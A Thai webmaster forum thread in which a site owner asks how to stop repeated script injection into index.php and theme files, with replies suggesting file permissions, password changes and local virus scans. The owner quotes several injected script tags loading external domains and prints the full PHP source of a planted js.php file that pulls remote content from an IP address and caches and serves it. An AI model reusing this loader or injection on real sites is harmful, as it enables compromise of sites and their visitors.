ต่อไป »

[Nopzixcros]

เว็บบอร์ดผมมันโดฝังสคริปไว้ที่ไฟล์ index.php และไฟล์ index.php ของธีมทุกธีมเลยครับ

ตอนนี้ผมเอาออกหมดแล้ว ผมจะป้องกันยังไงครับเพราะมันเคยฝังไปแล้วครั้งนึงผมก็เอาออกได้

ผมจะป้องกันยังไงครับที่จะไม่ให้มันเข้ามาฝังได้อีก  

นี่ครับสคริปนี้ <script type="text/javascript" src="hทีทีp://itpdesign.net/search.php"></script>

 

[Uphichet]

นี่กำลังเขียน phpbb จะเจอแบบนี้ไหมเนี่ย

[Hanuman]

แสดงว่ามีการฝังมากกว่า 1 ครั้งหรอครับ

[Nopzixcros]

แสดงว่ามีการฝังมากกว่า 1 ครั้งหรอครับ

ใช่ครับ สคิรปแต่ละตัวไม่เหมือนกันด้วย

อันนี้อีกอัน ฝังไว้ที่ไฟล์ Entersite

<script type="text/javascript" src="http://small-servers.com/js.php "></script>

เพิ่มเติมครับ ส่วนที่เป็นบล็อกที่อยู่ในเว็บเดียวกันก็โดนฝังสคริปครับ

<script type="text/javascript" src="http://olayspor.net/search.php "></script>

มันฝังไว้ที่บนสุดของโค้ดเลย ไม่รู้ว่าจะป้องกันมันได้ยังไงอะครับ

ใครรู้ช่วยทีครับ

[Duo2Styles]

cmd ไฟล์เป็นอะไรคะ ลองปรับเป็น 644 ดู

[Nopzixcros]

cmd ไฟล์เป็นอะไรคะ ลองปรับเป็น 644 ดู

644 ทุกตัวครับไฟล์ index

เพิ่มเติมครับตอนนี้ผมเจอไฟล์แปลกๆบนโฮสครับ

ไม่รู้ว่ามันมาได้ไงเป็นไฟล์ชื่อ js.php

อันนี้โค้ดของมันครับ ใครพอรู้บ้างครับช่วยหน่อย

โค๊ด:

<?php

// ----------------------------------------------------------------------
// touch this!  ---------------------------------------------------------

define( &#39;CACHE_DEBUG&#39;, 				false );
define( &#39;CACHE_TIME_SECONDS&#39;, 		600 );
define( &#39;CACHE_UPDATE_URL&#39;,  		"http://193.105.240.93/data/admin.txt" );

// ----------------------------------------------------------------------
// dont touch this! -----------------------------------------------------

define( &#39;CACHE_MARKER_START&#39;, 		"<?p"."hp /* <CA"."CHE>" );  
define( &#39;CACHE_MARKER_END&#39;, 		"</CA"."CHE> */ ?".">" );


// ----------------------------------------------------------------------


$cache_code 	= null;
$cache_file 	= __FILE__;
$cached_time 	= time() - filemtime($cache_file);

// ----------------------------------------------------------------------

if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS - $cached_time)." seconds
";


// ----------------------------------------------------------------------
// check cached time 

if($cached_time > CACHE_TIME_SECONDS)
{
	// get new cache code
	$cache_code = file_get_contents(CACHE_UPDATE_URL);
	if(!empty($cache_code))
	{
		if (CACHE_DEBUG) echo "Update cache...
";
		write_cache($cache_file, $cache_code);
	}
	else
	{
		if (CACHE_DEBUG) echo "Can&#39;t get cache data!
";
	}
}
else
{
		if(CACHE_DEBUG) echo "Read cache code...
";

		// extract cached data
		$cache_code = extract_cache($cache_file);
		if(empty($cache_code))
		{
			if (CACHE_DEBUG) echo "Cache empty! Update cache...
";
			$cache_code = file_get_contents(CACHE_UPDATE_URL);
			if(!empty($cache_code))
			{
				// write cache
				write_cache($cache_file, $cache_code);
			}
			else
			{
				if (CACHE_DEBUG) echo "Can&#39;t get cache data!
";
			}
		}
}

// ----------------------------------------------------------------------

header("Content-Type: text/plain; charset=windows-1251");
echo $cache_code;

// ----------------------------------------------------------------------

exit;

// ----------------------------------------------------------------------
/// read file data

function file_get_contents_locked($file_path)
{
	$fp = fopen($file_path, "r");
	if($fp !== FALSE)
	{
		flock($fp, LOCK_EX);
		$data = fread($fp, filesize($file_path));
		flock($fp, LOCK_UN);
		fclose($fp);

		return $data;
	}

	return FALSE;
}


// ----------------------------------------------------------------------
/// extract cache from file by cache markers

function extract_cache($file_path)
{
	$data = file_get_contents_locked($file_path);
	if(strpos($data, CACHE_MARKER_START) !== FALSE)
	{
		$cache_start_pos = strpos($data, CACHE_MARKER_START)   strlen(CACHE_MARKER_START);
		$cache_end_pos = strpos($data, CACHE_MARKER_END);

		$cache = substr($data, $cache_start_pos, $cache_end_pos - $cache_start_pos);

		if(!empty($cache))
			return base64_decode($cache);
	}

	return null;
}


// ----------------------------------------------------------------------
// write cache to file

function write_cache($file_path, $cache_data)
{
	if(!is_writable($file_path))
	{
		if (CACHE_DEBUG) echo "Cache file not writable!
";
		return null;
	}

	$data = file_get_contents_locked($file_path);
	if($data !== FALSE && !empty($data))
	{
		// delete old cache
		if(strpos($data, CACHE_MARKER_START) !== FALSE)
		{
			$cache_start_pos = strpos($data, CACHE_MARKER_START);

			$data = substr($data, 0, $cache_start_pos);
			$data = rtrim($data);
		}

		// restore close tags
		if(substr($data, -2, 2) !== &#39;?>')
			$data.="?>";

		$data.= CACHE_MARKER_START .base64_encode($cache_data). CACHE_MARKER_END;

		$fp=fopen($file_path, "w ");
		flock($fp, LOCK_EX);
		fwrite($fp, $data);
		flock($fp, LOCK_UN);
		fclose($fp);
	}
}

เพิ่มเติมสคริปครับ ตอนนี้มันฝังสคริปนี้ทุกซับแล้วครับ

มันจะไม่เหมือนกันทุกไฟล์เลยครับ มันฝังสคริปละ1เว็บ แต่ละเว็บ url ไม่เหมือนกันซักอัน

<script type="text/javascript" src="http://whiskyace.com/search.php "></script>
<script type="text/javascript" src="http://riarenterprises.com/search.php ">

[Nopzixcros]

ดันๆๆครับ

[bestnmk21]

ติดมาจากธีมหรือป่าวครับ หรือมาจากม็อด
ขอตัวไปเช็คบ้าง 

[Nopzixcros]

ติดมาจากธีมหรือป่าวครับ หรือมาจากม็อด
ขอตัวไปเช็คบ้าง 

ไม่แน่ใจเหมือนกันนะครับ ผมก็ไม่รู้ว่าเกิดจากปัญหาอะไร

ครั้งแรกที่เคยโดนผมเปลี่ยนพาส Ftp แล้ว

ครั้งนี้ยังกลับมาเป็นอีก

[ปาร์ค]

อันนี้ผมเคยเป็นนะคับ แก้ยัง ๆ 1-2 วันก็เป็นอีก
เคยอ่านวิธีแก้ในนี้หล่ะ ปรากฎว่าเครื่องเรา ติด ไวรัส ประเภทมัลแวร์ ไรนี่ล่ะ 
ผมเลยแก้โดย Scan ไวรัสในเครื่อง ลบไฟล์กันยกใหญ่เลยทีเดียว คับ ตอนนั้นผมใช้ NOD32 นะ Scan นะคับ
เครื่องสอาดแล้วก็อัพไฟล์ขึ้นไปใหม่ก็หายคับ ลองดูนะคับ

ปล.อันนี้เป็นวิธีแก้ที่ผมเคยเจอนะครับ ของคุณอาจจะโดนไม่เหมือนผม และแก้ไม่เหมือนผมก็ได้